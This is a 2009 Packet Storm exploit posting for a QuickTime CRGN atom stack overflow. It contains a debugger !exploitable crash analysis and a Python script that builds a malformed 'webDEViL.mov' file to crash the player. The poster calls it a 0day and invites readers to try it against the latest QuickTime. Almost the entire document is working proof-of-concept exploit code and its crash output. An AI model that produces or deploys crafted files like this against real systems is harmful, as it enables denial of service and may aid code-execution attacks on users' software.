Apple QuickTime CRGN Atom Overflow

2009-06-15T00:00:00
ID PACKETSTORM:78411
Type packetstorm
Reporter webDEViL
Modified 2009-06-15T00:00:00

Description

                                        
                                            `Try it with your latest quicktime player.  
--------------------------------------------------------------  
  
#0:000> !exploitable -v  
#HostMachine\HostUser  
#Executing Processor Architecture is x86  
#Debuggee is in User Mode  
#Debuggee is a live user mode debugging session on the local machine  
#Event Type: Exception  
#Exception Faulting Address: 0x66830f9b  
#First Chance Exception Type: STATUS_STACK_OVERFLOW (0xC00000FD)  
#  
#Faulting Instruction:66830f9b push ebx  
#  
#Basic Block:  
# 66830f9b push ebx  
# Tainted Input Operands: ebx  
# 66830f9c push ebp  
# 66830f9d mov ebp,dword ptr <unloaded_papi.dll>+0x41f (00000420)[esp]  
# 66830fa4 push esi  
# 66830fa5 push edi  
# 66830fa6 mov edi,ecx  
# 66830fa8 cmp edi,offset <unloaded_papi.dll>+0x5ff (00000600)  
# 66830fae mov ebx,edx  
# 66830fb0 mov dword ptr [esp+14h],eax  
# 66830fb4 mov byte ptr [esp+10h],0  
# 66830fb9 mov byte ptr [esp+11h],0  
# 66830fbe mov byte ptr [esp+12h],0  
# 66830fc3 je quicktime!dllmain+0x2fbc4 (668310a4)  
#  
#Exception Hash (Major/Minor): 0x614b6671.0x614b786e  
#  
#Stack Trace:  
#QuickTime!DllMain+0x2fabb  
#<Unloaded_papi.dll>+0x1231137  
#Instruction Address: 0x66830f9b  
#  
#Description: Stack Overflow  
#Short Description: StackOverflow  
#Exploitability Classification: UNKNOWN  
#Recommended Bug Title: Stack Overflow starting at  
QuickTime!DllMain+0x2fabb (Hash=0x614b6671.0x614b786e)  
  
print "------------------------------"  
print "w3bd3vil [at] gmail [dot] com"  
print "Apple QuickTime CRGN Atom 0day"  
print "------------------------------"  
bytes = [  
0x00, 0x00, 0x00, 0x18, 0x66, 0x74, 0x79, 0x70, 0x33, 0x67, 0x70,  
0x35, 0x00, 0x00, 0x01, 0x00, 0x33, 0x67, 0x70, 0x35, 0x33, 0x67,  
0x70, 0x34, 0x00, 0x00, 0x01, 0x16, 0x6D, 0x6F, 0x6F, 0x76, 0x00,  
0x00, 0x00, 0x6C, 0x6D, 0x76, 0x68, 0x64, 0x00, 0x00, 0x00, 0x00,  
0xBF, 0x88, 0x12, 0x28, 0xBF, 0x88, 0x12, 0x28, 0x00, 0x00, 0x02,  
0x58, 0x00, 0x00, 0x0B, 0x90, 0x00, 0x01, 0x00, 0x00, 0x01, 0x00,  
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,  
0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,  
0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,  
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00,  
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,  
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,  
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x03, 0x00, 0x00, 0x00,  
0xA2, 0x74, 0x72, 0x61, 0x6B, 0x00, 0x00, 0x00, 0x5C, 0x74, 0x6B,  
0x68, 0x64, 0x00, 0x00, 0x00, 0x01, 0xBF, 0x88, 0x12, 0x28, 0xBF,  
0x88, 0x12, 0x28, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00,  
0x00, 0x00, 0x0B, 0x90, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,  
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01,  
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,  
0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,  
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00,  
0x00, 0x00, 0xB0, 0x00, 0x00, 0x00, 0x90, 0x00, 0x00, 0x00, 0x00,  
0x00, 0x1A, 0x63, 0x6C, 0x69, 0x70, 0x00, 0x00, 0x00, 0x0E, 0x63,  
0x72, 0x67, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF,  
0xFF, 0xFF, 0x00, 0x00, 0x00, 0x24, 0x65, 0x64, 0x74, 0x73, 0x00,  
0x00, 0x00, 0x1c, 0x65, 0x6c, 0x73, 0x74, 0x00, 0x00, 0x00, 0x00,  
0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x0b, 0x90, 0x00, 0x00, 0x00,  
0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x66, 0x72,  
0x65, 0x65, 0x00, 0x00, 0x00, 0x08, 0x66, 0x72, 0x65, 0x65 ]  
  
f = open("webDEViL.mov", "wb")  
for byte in bytes: f.write("%c" % byte)  
f.close()  
print "webDEViL.mov created! (%d bytes)" % len(bytes)  
`